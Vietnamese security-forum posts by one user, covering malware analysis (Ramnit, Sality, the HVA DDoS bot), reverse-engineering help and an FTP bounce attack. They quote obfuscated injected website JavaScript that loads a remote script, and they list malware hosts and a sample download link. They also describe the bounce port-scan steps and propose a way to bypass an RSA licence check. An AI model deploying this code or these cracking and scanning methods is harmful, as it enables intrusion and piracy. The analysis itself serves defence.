Messages posted by "acoustics89"

Ollybg Tut 16 ++++

acoustics89 — GMT

kienmanowar wrote:

bantinbk wrote:

Sao mình còn lưu bộ Ollydbg tut của bạn kienmanowar tới 22 nhỉ, còn ghi chú từ được soạn từ ngày 27/01/2010
Quá chuẩn :). Đến tut22 thì do quá bận rộn nên đành tạm treo Regards,

Anh có kế hoạch cho tut23 chưa anh? Anh làm loạt tut về unpack driver được không ạ? Em có đọc một số bài viết của inREVERSE về Driver packer nhưng có một số chỗ vẫn chưa hiểu, ví dụ như: - Theo bài viết của inREVERSE: "cần đổi giá trị subsystem type của driver từ Native thành Windows GUI và chạy nó như một file thực thi thông thường". Do đó, có thể dùng Olly để unpack. Trong trường hợp driver gọi các hàm, structure của kernel thì em phải làm thế nào? - Nếu buộc phải unpack driver ở kernel mode, thì dump và fix IAT thế nào ạ? Mong nhận được hồi âm của anh !

Tại sao khi sử dụng Crontabl thì không lệnh không thực hiện ?

acoustics89 — GMT

quanta wrote:

Bạn có thể dùng `incrond`, tiếp theo là `watcher`. Hoặc "cao cấp" hơn là DRBD + GFS2.

Mình vote cho DRBD + GFS2. Bạn chủ thread nên dùng thử

Bị hack & xem trộm Gmail, Facebook

acoustics89 — GMT

bạn gái của bạn tuongcuopdatinh là hacker thì sao, cứ nghĩ đâu xa xôi, con gái giờ cũng ghê gớm lắm. =)) Giải pháp của bạn bây giờ là thực hiện đầy đủ 4 điều sau đây, thiếu cái nào cũng không được: 1. Cài lại windows, mà nếu không thì cài linux đi. Không biết anh em khác thế nào, máy laptop của em cài linux, bạn mà em quen thì toàn dùng windows, không thấy cái nút nào để click là nó sẽ không dùng nữa. 2. Nếu cài hệ điều hành xong thì nên cài thêm 1 cái antivirus vào, win8 có MSE luôn đấy. 3.Lập một tài khoản mới, ( gmail mới, facebook mới....) nói chung là mới hết, rồi chuyển hết thông tin sang đấy, cái cũ thì tặng bạn gái làm kỉ niệm luôn. 4. Chia tay bạn gái :D

Decode javascript

acoustics89 — GMT

Bạn có thể đưa cả trang web không?

Nhờ mọi người unpack giúp mình cái này

acoustics89 — GMT

VM code + fully polymorphic packer. nhìn đã thấy ghê rồi.

FTP Bounce Attack

acoustics89 — GMT

Chào bạn, vấn đề của bạn có thể giải quyết nếu bạn đọc lại link trên và bộ giao thức FTP. mình giả định attacker cần tấn công máy chủ có IP là a1.a2.a3.a4. Attacker cần thăm dò xem máy chủ mở những cổng nào 1. server mở data connection hay client mở là do client quyết định. có 2 lệnh là PORT và PASV. PORT cung cấp cổng để server kết nối tới PASV sẽ yêu cầu server mở cổng , client kết nối tới và nhận dữ liệu. Phía nào mở kết nối trứoc hoàn toàn do client quyết định 2. Khi dùng lệnh PORT a1,a2,a3,a4,p1,p2 với a1. a2.a3.a4 là ip của máy cần tấn công p1, p2 là 2 số mô tả cổng cần tấn công. Số hiệu cổng = 256*p1 + p2; Cách tấn công như sau: attacker tìm một public ftp server. kết nối tới qua cổng command. attacker gửi lệnh PORT với IP và port của server cần tấn công. Kết quả trả về trên command connection cho biết cổng đó có mở hay không.

Putty dính virus

acoustics89 — GMT

Confirm với bolzano_1989: bạn nói đúng, nó là mẫu Ramnit. MSE nhận diện là dòng Ramnit.J Bài phân tích về dòng virus này thì rất nhiều trên mạng, không biết bạn muốn tìm hiểu phần nào? Mình mô tả sơ lược vậy: Mẫu được pack bằng nhiều lớp, thứ tự từ ngoài vào trong là UPX, manual packer( phong cách Spaghetti code, rất khó chịu), 1 lớp UPX nữa. Lớp code trong cùng chả rõ build bằng trình biên dịch nào, Anh chị nào biết thì chỉ em với Sau đó thì sẽ có các hành vi như : lây file (exe, html), Lây vào usb ( file autorun và tạo các shortcut khai thác lỗ hổng) Có 4 shortcut, có lẽ nhiều bạn mới đọc sẽ thắc mắc vì sao là 4 mà không phải 1. đó là vì trên mỗi hệ điều hành, cần 1 dạng đường dẫn khác nhau, và ramnit cần tương thích với tất cả phiên bản của windows. Code:

Windows7:

\\.\STORAGE#Volume#_??_USBSTOR#Disk&Ven_____USB&Prod_FLASH_DRIVE&Rev_#12345000100000000173&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~*.exe

Windows Vista:

\\.\STORAGE#Volume#1&19f7e59c&0&_??_USBSTOR#Disk&Ven_____USB&Prod_FLASH_DRIVE&Rev_#12345000100000000173&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~*.exe

Windows XP, Windows Server 2003 and Windows 2000:

\\.\STORAGE#RemovableMedia#8&1c5235dc&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~*.exe

một file CPL chứa thông tin về icon của shortcut. khi explorer gọi Shell32.LoadCPLModule, các shortcut độc sẽ chạy virus. Có 2 module mở cổng lắng nghe kết nối từ bên ngoài module thứ nhất mở cổng 4678, hiện đang bị disable. có lẽ người code chưa hoàn thiện tính năng này module thứ 2 mở cổng 21, khiến máy nạn nhân thành 1 ftp server. username và password của ftp server này giống nhau, được hardcode trong virus, gồm 9 kí tự. Mình cài đặt mẫu virus này lên máy ảo trong mạng local của mình, và dùng file zilla để truy cập. Mình đưa ra kết luận, những máy tính bị virus rất có thể sẽ bị mất mát dữ liệu Ramnit kết nối tới 1 loạt server theo giao thức http để cập nhật và thực thi lệnh, chụp ảnh màn hình (? - tính năng này mình đang phân tích ) và 2 lệnh kos, dml , không hiểu để làm gì Phương án: bạn có thể dùng phần mềm diệt virus quét toàn bộ máy, nếu không thì cài lại win cho nhanh. Máy tính nhiễm lây file rồi diệt mất nhiều thời gian hơn cài lại đấy

FTP Bounce Attack

acoustics89 — GMT

n2tforever wrote:

cái này theo mình hiểu thì TCP là một kết nối 2 chiều vì thế cả client và server đều phải mở cổng để kết nối , số cổng client gửi ở lệnh PORT là cổng trên máy client (thường lớn hơn 1023) , server sau đó sẽ dùng cổng 20 của mình để kết nối đến cổng đó.

Server chỉ cần kết nối tới client là được, cần gì phải qua cổng 20. trường hợp nhiều client thì server sẽ dùng cổng 20 cho client nào?? Cổng 20 chỉ là lý thuyết, thực tế sẽ khác bạn ạ

FTP Bounce Attack

acoustics89 — GMT

theo cái link http://www.cert.org/tech_tips/ftp_port_attacks.html thì kĩ thuật này có thể dùng với nhiều mục đích khác nhau, tuy nhiên có 1 số mục đích như: Port scanning Bypassing basic packet filtering devices Bypassing export restrictions bạn nên tham khảo ở đó khi dùng PORT command, thông tin về cổng có thể là số tuỳ ý, thông thường là 20 nhưng có thể đặt giá trị bao nhiêu cũng được, tất nhiên là < 65535

Cần giúp đỡ về PE Header !

acoustics89 — GMT

Nếu 1 xâu được cất trong resource, bạn dùng Resource hacker hoặc mấy tool edit resource là ổn. Với trường hợp xâu được lập trình viên để trong code, mình nghĩ bạn cần 1 disassembler , ví dụ như IDA. Mở file Exe bằng IDA, bạn nhấn Shift F12 để nó tìm tất cả các String của file, có thể nếu IDA không phân tích được đầy đủ file, bạn phải tìm các xâu này bằng tay. Nhưng như thế là nhanh hơn cách bạn làm rất nhiều. Có nhiều yếu tố khiến cho cách việt hoá của bạn không thành công: Các tác giả không build ở chế độ Unicode -- kiểu này thì khỏi cần việt hoá, vì không làm được. Tiếng Anh ngắn gọn và xúc tích hơn tiếng Việt ví dụ như từ time (4 kí tự ) dịch ra tiếng Việt là "thời gian" (9 kí tư). Bạn không thể để 9 kí tự vào ô nhớ của 4 kí tự được. Trừ khi ăn may, gặp cavity, còn về lý thuyết, bạn phải tạo thêm 1 section nữa hoặc nới rộng section cuối, viết các xâu tiếng Việt vào đó và sửa địa chỉ con trỏ ở tất cả các vị trí trong file trỏ tới xâu tiếng Việt. Để tìm nhanh vị trí cần sửa, có thể phải dùng IDA hoặc Olly Dbg. Số vị trí cần sửa có thể là 1, 2 chỗ hoặc rất nhiều. Ngoài ra, để sửa địa chỉ chính xác, bạn cần xem section đó có được relocation khi load lên bộ nhớ không. Bạn cũng nên tìm hiểu thêm về ASLR, để tránh sửa nhầm địa chỉ, khiến file bị lỗi. Như mình đã trình bày, công việc sửa thế này cực kì vất vả và khó khăn. Cách dễ nhất là email yêu cầu tác giả build 1 bản cho tiếng Việt. Nhưng xem ra cách này lại vướng khó khăn kiểu khác, bạn nhỉ?

Cần hướng dẫn lập trình trojan

acoustics89 — GMT

phanledaivuong wrote:

acoustics89 wrote:

Ôi, các bạn đang nói về thầy mình :D
A, hoá ra trẻ tuổi acoustics89 trước học BK. ..

bây giờ mình đã ra trường đâu. Hôm nào mấy bạn tới thăm bk đi; nhớ đợt trước có 1 đoàn sinh viên hay giáo viên nước ngoài , sang BK tham quan, họ nhận xét 1 câu :"Phòng thí nghiệm của các bạn y hệt của chúng tôi cách đây 20 năm" =((

Cần hướng dẫn lập trình trojan

acoustics89 — GMT

Ôi, các bạn đang nói về thầy mình :D Có thể nói vài điều về thầy thế này: Đúng là trước đây thầy có đi thực tập tại bkis, nhưng mà sau đó cũng nghỉ lâu rồi, như bạn Bol tìm ra thì cũng từ năm 2007, từ đó tới giờ, mọi thứ thay đổi cũng nhiều rồi, 5 năm là khoảng thời gian dài. Bây giờ thầy đi làm về mảng điện thoại di động với đi dạy học thôi. Thầy cũng có công ty riêng rồi, khoản thu nhập thì chắc chắn hơn rất nhiều khi làm ở bkav . Nói chung, thầy là người vui tính và khá cẩn thận, nếu các bạn anti bkav thì thoải mái đi, mình không quan tâm, nhưng mà thầy Hoàng cũng dạy mình khá nhiều môn, cũng có thời gian mình làm bài tập lớn do thầy hướng dẫn, thế nên đừng gạch đá nhiều quá. Trong mấy post trên cũng thấy có bạn bảo bác Quảng là giáo viên trong trường, cái đấy đúng, nhưng mà trong vòng mấy năm trở lại đây, có ai được học tiết nào đâu, giờ bác Quảng đi kinh doanh là chủ yếu, sinh viên muốn gặp mặt thì khó lắm. Cái mà bạn bolzano đưa là website của bộ môn, đã lâu lắm không cập nhật vì không có ai làm. Giờ mới cho sinh viên đang viết lại. Bộ môn KTMT thiếu giảng viên trầm trọng luôn, các thầy hầu hết bị quá tải do dạy nhiều tiết quá, nhưng mà cấp lãnh đạo ( tức là từ hiệu trưởng ) thì lại không muốn đi thuê người khác làm web ( do tự ái của 1 trường công nghệ mà cái web không nên thân ??? phải thuê ngoài, cái này em đoán mò thế ) + không cấp kinh phí nên cái website mới bị bỏ mặc như vậy. Nếu có mấy bác trên này về trường em làm giảng viên chắc đỡ hơn nhiều.

Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?

acoustics89 — GMT

paranoidx wrote:

Không biết ở đây còn nhận hàng không. Mình bị 1 con gì chả biết, nó lây lan trên website của mình, đây là đoạn mã của nó : var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ; Hiện tại mình đã hồi phục. Nhưng ko biết còn bị nữa không. Bạn có thể cho mình biết cách nào nó đã lây vào các file *.js có trong host của mình không ? các file js đều là hàm chạy nội bộ chỉ xử lý animation, mình dùng wordpress. Thân,

TimThumb trong theme có lỗ hổng , và lỗ hổng này cũng bị khai thác khá nhiều rồi http://www.exploit-db.com/wordpress-timthumb-exploitation mong bạn bol có thể chỉ giáo thêm, về phần này mình mù tịt

Cách vượt qua một phần mềm check Lisence bằng RSA

acoustics89 — GMT

Bạn làm thế nào hay vậy, sẵn có file thật và tình huống thật bạn có thể viết 1 cái tutorial không. Ý tưởng của mình đưa ra , mình mới áp dụng thành công khi thịt bộ cài của Asprotect để mình pack các sản phẩm của mình, nhưng cũng lâu lắm rồi bạn à. Nhưng với các trường hợp khác, mình nghĩ khó thành công lắm, nên không hiểu bạn làm thế nào. Chia sẻ kinh nghiệm với mọi người bạn nhé. Thank bạn!

Cách vượt qua một phần mềm check Lisence bằng RSA

acoustics89 — GMT

Vấn đề của bạn đưa ra rất hay, mình nảy ra ý thế này: Nếu dùng RSA thì chắc nó phải lưu public key tại 1 nơi nào đó, bằng reverse, bạn có thể biết được vị trí và cách lưu Dùng các công cụ khác tự tạo cho mình 1 public key và private key, patch vào vị trí kia public key mới. Khi đó, private key của mình, mình sinh ra 1 file lic,rồi dùng file đó để check

Các lớp học miễn phí của đại học Stanford

acoustics89 — GMT

Cám ơn anh đã thông báo, hi vọng được sự giúp đỡ của anh nhiều hơn. Em đã đăng kí khóa học này.

Nhiều biến XOR với nhau

acoustics89 — GMT

Bạn chủ topic nói đến XOR , làm mình nhớ đến đoạn code này Code:

int a = 5;
int b = 7;
a ^= b ^= a ^= b;

hỏi sau đoạn code trên, a = ? và b = ?

Cách diệt autorun vs virus usb hiệu quả nhất mình từng biết

acoustics89 — GMT

J4ckSparrow wrote:

nó không tốn ram như các chương trình virus. Trường hợp phần mềm virus bị nhiễm lun thì sao ? Lây lan toàn tập. Bởi vì lúc ta đã xóa xong rút ra ngay thì ngăn chặn việc lưu trữ ( tạo) lại file autorun.inf

Có lẽ bạn chưa biết cơ chế tự bảo vệ của các antivirus nhỉ. trường hợp cài AV mà cũng vẫn bị nhiễm thì khác gì không cài, người ta tốn tiền làm gì. Theo mình để an toàn chỉ có 2 cách: 1. Dùng Linux 2. Dùng windows + cập nhật + AV. không cần mẹo gì hết, đỡ phiền. AV giờ dư sức chặn các virus lây qua usb

sữ dụng máy ảo có thật sự an toàn trước virut

acoustics89 — GMT

peter_nguyen1405 wrote:

Không biết mình hiểu bài viết của bạn như vầy có đúng không. Khi cấu hình máy ảo xài card bridge như bạn thì máy ảo gần như là 1 máy client chạy song song với máy thật ( về khía cạnh mạng Lan). Nếu mình hiểu như thế là đúng, vậy làm sao đỡ được trường hợp Virus flood mạng Lan ? Dạng kiểu như các dòng misa.exe hoặc Kavo. Mình cũng gặp tình trạng 1 máy nào đó trong mạng lan thường xuyên broad cast các gói tin để truyền các mã độc trong môi trường Lan. Không biết anh em có ai rành loại này và cách khắc phục

Bạn có lẽ chưa đọc kĩ bài viết của mình. Mình cũng nói là 2 máy tính khi đó ngang hàng nhau trong LAN. Mình cũng đã nghĩ đến trường hợp bạn nêu nên mình khuyên khi dùng bridge thì nên tạo VLAN. ( Tham khảo : ) http://en.wikipedia.org/wiki/Virtual_LAN mục đích để cách ly máy ảo và máy thật với nhau. Cách thiết lập VLAN có lẽ các bạn tìm trên internet sẽ đầy đủ và chi tiết hơn

sữ dụng máy ảo có thật sự an toàn trước virut

acoustics89 — GMT

Ky0 wrote:

Thực ra các antivirus quét vùng nhớ được cấp phát cho máy ảo nên phát hiện ra thôi! Nguy cơ nhiễm virus từ máy ảo khá cao, và thực tế đã có vài loại virus đã lây lan từ máy ảo qua máy thật. Tốt nhất nên dùng Ollydebug hoặc một tool nào đó khác chạy chương trình step by step phân tích thì hay hơn :D - Ky0 -

Gặp packer hoặc anti-debug trick thì móm anh ơi. Olly cũng ghê lắm. dùng máy ảo cho tiện

sữ dụng máy ảo có thật sự an toàn trước virut

acoustics89 — GMT

khang0001 wrote:

TheShinichi wrote:

khang0001 wrote:

mình có thói quen dùng máy ảo để test virut và xài soft có keygen hay patch. thế nhưng thỉnh thoảng vẫn thấy anti virut của mình báo là có virut dc phát hiện ở máy ảo. mình xài virturl box. cấu hình mạng xài nat, không share bất cứ folder nào ở máy chính cho máy ảo và ngược lại. mình nghĩ nếu virut mà bị phát hiện như thế thì các con virut mới hơn , qua mặt dc anti virut thì khả năng máy chính bị nhiễm khá cao. có pác nào có cao kiến gì để có thể test virut an toàn trong máy ảo không
Bạn có thể mô tả chi tiếp phần màu đỏ không ? Mình chưa hình dung được ?
có nghĩa là khi mình sữ dụng soft có crack hoặc lướt web thì trình anti virut của mình cảnh báo có 1 con virut abc gì gì đó ở trong máy ảo. và nó đã block . theo mình hiểu thì có thể con virut đó đã thoát ra khỏi máy ảo xâm nhập vào máy thật nên anti virut đã cảnh báo . hình nè

Theo mình đọc mô tả, và quan trọng nhất là hình bạn đưa, mình cho rằng bạn vẫn An toàn khi dùng máy ảo, không cần phải lo lắng. Lý do có thông báo của KIS: mình đoán bạn dùng máy ảo, thiết lập ở chế độ NAT khi truy cập mạng, khi đó mọi luồng dữ liệu của máy ảo trước tiên phải đi qua máy thật rồi mới ra ngoài. Địa chỉ kết nối tới chứa mã độc, do KIS phát hiện ra, nên KIS thông báo. Tiến trình kết nối là máy ảo. Cách khắc phục: Bạn thiết lập Network Adapter của máy ảo là Bridge. Máy ảo của bạn sẽ tương đương 1 máy tính khác trong LAN, ngang hàng với máy thật. Trong chế độ này, bạn hãy tắt chế độ chia sẻ file của máy thật và cập nhật các bản vá cho máy thật, đề phòng bị tấn công khi máy thật có lỗ hổng. Ngoài ra để an toàn cho bạn, bạn thiết lập 1 VLAN, sau đó đặt chế độ Bridge cho máy ảo, sử dụng dải VLAN khác với máy thật. Điều này sẽ là tốt nhất cho bạn, hạn chế các tấn công kiểu Zero-day. Về việc quét bộ nhớ của máy ảo: theo mình là có khả năng này, nhưng cực thấp vì những lý do sau: - Bộ nhớ máy ảo được mã hoá và tổ chức khác với dữ liệu bình thường, do đó nếu không sử dụng các API do máy ảo cung cấp, bạn không thể truy cập được dữ liệu này. Theo mình biết, hiện tại VMware cung cấp API cho phép quét các file và bộ nhớ bên trong máy ảo, VirtualBox thì không biết thế nào - Nếu AV quét cả nội dung dữ liệu bên trong máy ảo, thường AV đó hay đặt tại các server hoặc các máy host cho thuê. Trong các version cho người dùng thông thường, họ sẽ bỏ tính năng này vì không cần thiết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

mv1098 wrote:

Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.

bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

mv1098 wrote:

Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv (Chú ý: Các bạn không nên dơwnload File GoogleUpdate.exe này về máy, trừ khi muốn nghiên cứu một virus khác, virus "Sality". Virus Sality có đăc điểm khi nhiễm vào máy sẽ tìm tất cả các file .exe trong máy và nhân bản virus. Virus lấy tên file nguyên bản mà nó vừa nhiễm vào. Vì vậy trong máy sẽ đầy rẫy các nhân bản virus Sality và hệ thông sẽ ngưng chạy-PXMMRF-HVA)

Lâu lâu mới vào forum, anh em post nhộn nhịp quá :D Trong khi chờ toàn bộ file mới của GoogleCrashHandle thì em tải file này về phân tích thử, xem Sality là virus gì mà thấy các hãng phải có tool riêng để remove. Phải đổi gió chút, code của stl RE mãi cũng chán, vì lần nào cũng giống nhau cả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

TQN wrote:

Ừ, lạ ha ! Sao giờ decode lại được, lúc chiều wget về thì decode không được ? Cảm ơn acoustics89 nhé ! À anh quên mất, hồi đó em có PM cho anh, anh xoá mất rồi. Mẫu nào download thằng top.jpg từ http://penop.net/top.jpg ? Sẵn tiện acoustics89 xem lại hàm decode top.jpg của em luôn nhé, anh build hay dựa trên nó viết script đều decode không ra.

thuật toán decode thì đoạn này là quan trọng nhất, em decode ra 1 xâu unicode nhưng mà làm vội nên cứ để nguyên thế mà ném vào file txt, anh mở ra thì thấy nó có khoảng cách, dùng tạm cũng được. mẫu tải top là googlecrashhandler, từ đâu chắc anh vẫn nhớ :D Code:

fseek(f, 0, SEEK_END);
 		lSize = ftell(f);
 		fseek(f, 0, SEEK_SET);
 
 		pBuffer =(char*) malloc(lSize+1024);
 		if(pBuffer)
 		{
 			
 			p = (char *)pBuffer+ 4;
 			memset(pBuffer, 0, lSize+1024);
 			fread((char*)pBuffer, lSize, 1, f);
 
 			for ( i = 8; i < lSize; ++i )
 			{
 				v24 = p[v7 % 4];
 				v23 = pBuffer[i];
 				v23 = (v24 ^ v23) % 256;
 				pBuffer[i] = v23;
 				v7++;
 				//v8 += v23 * v7++ % 7;
 			}
 		}
 		fclose(f);

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

TQN wrote:

Host second.dinest.net lại được stl đánh thức dậy để hoạt động. xc.jpg tại: http://second.dinest.net/xc.jpg (User-Agent: An0nym0453) đã thay đổi cách mã hoá, nên tool decode lúc trước sẽ không decode hết được. Đang chờ đợi acoustics89 RE và cập nhật tool decode.

em tưởng anh TQN bảo code giải mã file TOP, em post rồi đấy, còn cái kia thì vẫn decode bình thường mà, có lỗi gì đâu

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

2TQN: hàng decode top như anh yêu cầu, vì làm vội nên không đẹp lắm, anh thông cảm Code:

#include 
#include 
#include 

int main(int argc, char *argv[])
{
	FILE *f; int i;
	long lSize;
	char *pBuffer, *p;
	char v24,v23; 
	int v7 = 0;
	
	
	char szOutPut[MAX_PATH] = "";

	if ((argc <2) || (argc >3 ))
	{
		printf("Usage: Decode  ");
		exit(1);

	}
	if (argc == 2)
	{
		strcpy(szOutPut, "Decoded.txt");
	}
	else strncpy(szOutPut, argv[2],MAX_PATH);

	f = fopen(argv[1], "rb"); //doc file da ma hoa

	if (f)
	{
		fseek(f, 0, SEEK_END);
		lSize = ftell(f);
		fseek(f, 0, SEEK_SET);

		pBuffer =(char*) malloc(lSize+1024);
		if(pBuffer)
		{
			
			p = (char *)pBuffer+ 4;
			memset(pBuffer, 0, lSize+1024);
			fread((char*)pBuffer, lSize, 1, f);

			for ( i = 8; i < lSize; ++i )
			{
				v24 = p[v7 % 4];
				v23 = pBuffer[i];
				v23 = (v24 ^ v23) % 256;
				pBuffer[i] = v23;
				v7++;
				//v8 += v23 * v7++ % 7;
			}
		}
		fclose(f);


		if (pBuffer)
		{
			f = fopen(szOutPut, "wb");
			if (f)
			{
				fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
				fclose(f);
			}
			else printf("Can not open output file.");
			delete[] pBuffer ;
		}
	}
	else printf("Can not open input file.");
	return 0;
}

bạn này vẫn dùng http://second.dinest.net/xv.jpg và http://second.dinest.net/xc.jpg , user agent như cũ. Các thành phần khác đang phân tích.... O-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

rang0 wrote:

Nowhereman wrote:

tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!!
Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet.

Đối với malware của STL thì nên dùng phần mềm của symantec -:-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

trycatch wrote:

Giờ này có lẽ HVA vẫn đang bị ddos anh Conmale nhỉ, em mới check lại cái second.dinest.net thì thấy đã trỏ sang 1 IP khác là 46.166.147.48 ở Ru.

truy cập thử vào http://second.dinest.net/ nó hiện lên trang có 3 chữ lạnh lùng vãi: WTF =)) =)) =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

rang0 wrote:

Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat

kiểu mô tả này khá giống với googleCrashHandle trước đây, duy chỉ có điều không dùng steganography. file cấu hình hồi đó rất thô sơ, không xml

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Bây giờ chưa có mẫu mới hả anh, vẫn cái kia nó dos, lại còn post dòng này, bực quá. Code:

mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account ) lúc thì acourxxx :|